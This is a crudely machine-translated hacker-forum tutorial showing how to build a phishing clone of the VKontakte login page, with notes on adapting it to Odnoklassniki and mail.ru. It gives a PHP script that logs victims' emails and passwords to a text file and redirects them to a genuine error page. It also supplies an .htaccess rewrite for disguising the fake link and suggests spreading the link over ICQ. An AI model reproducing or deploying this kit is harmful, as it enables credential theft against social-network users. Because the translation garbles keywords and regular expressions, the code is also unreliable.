This page has been robot translated, sorry for typos if any. Original content here.

Fake pressé

[iNtrO]

Pour le faire il n'y avait rien, c'était le soir .... En fait, sur mon premier article (le premier sur anti-chat), j'ai été tiré par le fait que dans la section acheter / vendre / échanger / lancer sur un grand sujet il y avait déjà un hekker prodoval feyki 10 vmz, et souvent demandé de créer tel ou tel faux ...
Je vais vous raconter un article sur comment vous pouvez jouer avec un faux universel presque tout ce qui est détourné! Je vais montrer sur l'exemple de faux vkontakte.

[SeaRchINg]

Et donc, ce dont nous avons besoin, c’est de sélectionner la ressource et de collecter toutes les informations dont nous avons besoin, mais nous avons seulement besoin d’une copie de certaines pages . Nous appuyons sur le bouton, nous entrons dans le login.pxp, nous le prenons pour l'index de notre faux. Nous appuyons sur l'opéra: Fail -> Save as -> Dans la boîte de dialogue ouverte sous le nom choisir (il y a par défaut l'archive Web ....) " HTML Fail with images " et le graphique est requis Nom de fichier write index (ou login.htm - selon la page)


De plus nous y entrons des données irréelles et nous arrivons à la page sur laquelle il est écrit
Une telle adresse postale n'est pas enregistrée ou le mot de passe est incorrect.
Nous l’enregistrons de la même manière, mais au lieu d’index, nous écrivons mal .
Ensuite, nous conduisons dans Google.ru la phrase Vkontakte.ru, cliquez sur Résultats supplémentaires avec vkontakte.ru » et recherchez quelque chose lié à l'eroy du contact ... Sur la deuxième page, j'ai trouvé VKontakte | Erreur (http://vkontakte.ru/blank.php?code=10)- rappelez-vous, nous avons besoin de ce lien
États-Unis, tout ce dont nous avons besoin pour feyka de la ressource, nous avons déjà.

[CoDiNg]

Taxe, nous allons maintenant utiliser le formulaire de connexion. Ouvrez notre index.html et recherchez le formulaire de connexion.
 <form method = "post" name = "login" id = "login" action = "login.php">

  <input type = "hidden" name = "success_url" id = "success_url" value = "">
  <input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "gray"> Email: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "gray"> Mot de passe: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "mot de passe" name = "pass" value = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "margin-top: 1px; vertical-align: middle;"  type = "checkbox" name = "expire" id = "expire" value = "1" /> <petit> ordinateur étranger </ small>

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
De là, nous mémorisons 3 choses:
<form method = "post" name = "login" id = "login" action = "login.php">
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "mot de passe" name = " pass " value = "" id = "pass" size = "25" />
C'est dans ces 3 choses que se trouve la première partie de l'unicité, sur n'importe quel réseau social, emily ou ailleurs, partout où la forme de l'entrée (champ) sera dans ce genre (eh bien, seuls les noms des champs se réveillent)
<input id = "field_password" value = "" style = "width: 170px;" type = "password" size = "20" name = " st.password ">
Il suffit de distinguer le nom des champs, des éléments de conception, mais la fonction est la même pour tous.
Maintenant, nous créons un fichier php, et nous l'appelons login.php , son contenu:

Code PHP:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/ ^ ( [.0-9a-z_-]+) @ (( [ cents-9a- z - ]+ \ . )+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'password' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'password' ]. " \ n " );
en-tête ( "Emplacement: http: //" );
} sinon {
en-tête ( "Emplacement: http: //" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
En fait, regardez le script, quelques chaînes de caractères, mais ceci est tout à fait normal, ses fonctionnalités:
Sauvegarder les variables transférées, les vérifier, les rediriger en fonction de la vérification.

Et donc, maintenant nous revenons à ces 3 lignes:
<form method = "post" name = "login" id = "login" action = " login.php ">
ici nous avons tout en ordre, le nom de notre script correspond à leur nom, il ne coïncide pas, puis nous le remplaçons ou nous le renommons.
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "mot de passe" name = "pass" value = "" id = "pass" size = "25" />
De là, nous avons besoin de name = " email " et name = " pass "
Nous les collons dans notre script au bon endroit
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- réussite i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ n " );
en-tête ( "Emplacement: http: //" );
} sinon {
en-tête ( "Emplacement: http: //" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
Qui n'a pas remarqué, c'est $ _POST ['email'] et $ _POST ['pass']

Ensuite, regardez le script, puis la fonction SI ELSE apparaît, et si un champ de courrier électronique correspond à l'email (pseudo@mylo.ru, et non comment le message est envoyé) et que le champ de mot de passe n'est pas vide, la première redirection est exécutée le champ de passe est vide, alors le second est la redirection. Il en résulte que si la Chell est entrée dans un savon et quelque chose de similaire à une passe, alors nous la jetons sur la page avec l'érotique http://vkontakte.ru/blank.php?code=10 , et si vous êtes entré dans la poubelle (ici nous en avions besoin copie de la page bad.html? quand nous avons entré les mauvaises données), puis le jeter, c'est-à-dire entrer bad.htm.

Code PHP:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/ ^ ( [.0-9a-z_-]+) @ (( [ cents-9a- z - ]+ \ . )+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ n " );
en-tête ( "Emplacement: http://vkontakte.ru/blank.php?code=10" );
} sinon {
en-tête ( "Location: bad.htm" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
Nous sauvegardons toutes les conneries sur le serveur (login.php, index.htm + dossier avec fichiers, bad.htm + dossier avec fichiers), créez le fichier log.txt (je conseille à mon nom unique de sortir. N'oubliez pas de changer le script), mettez lui chmod777.

3) une petite mise à jour ...

Cette mise à jour est très appropriée pour SI, à la racine de ftp, nous créons un fichier .htaccess avec le contenu suivant:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -F
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ATTENTION !!!
! index \ .htm - cette redirection est référencée si vous avez un faux login.html. vous devez donc renommer l'index lors de la connexion.

Taxe, ce fichier nous donne un lien plus qualitativement gasily, à savoir:
votre / n'importe quel texte, si vous connaissez la structure du lien du faux, par exemple, contact, nous pouvons le faire:


yourfake.ro/ photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
et vparit it sur ICQ))) d'accord. moins visible maintenant faux))

C'est tout

[Le eND] En fait, c'est unique, mais le fait que vous puissiez passer à vos camarades de classe, également enregistrer la page, entrer des variables, remplacer les URL (ici, je donne immédiatement http://odnoklassniki.ru/dk?st.cmd=error) et tout, de la même manière allez sur mayile.ru, sauvegardez les variables et remplacez-les tous))) La seule chose dont vous pourriez avoir besoin, c’est la créativité, nous sauverons pas la page principale, mais la page de connexion. envoyer au PM
<a href="file"> lien vers un sujet </a>
, et dans le faux, vous spécifiez ce sujet pour la redirection.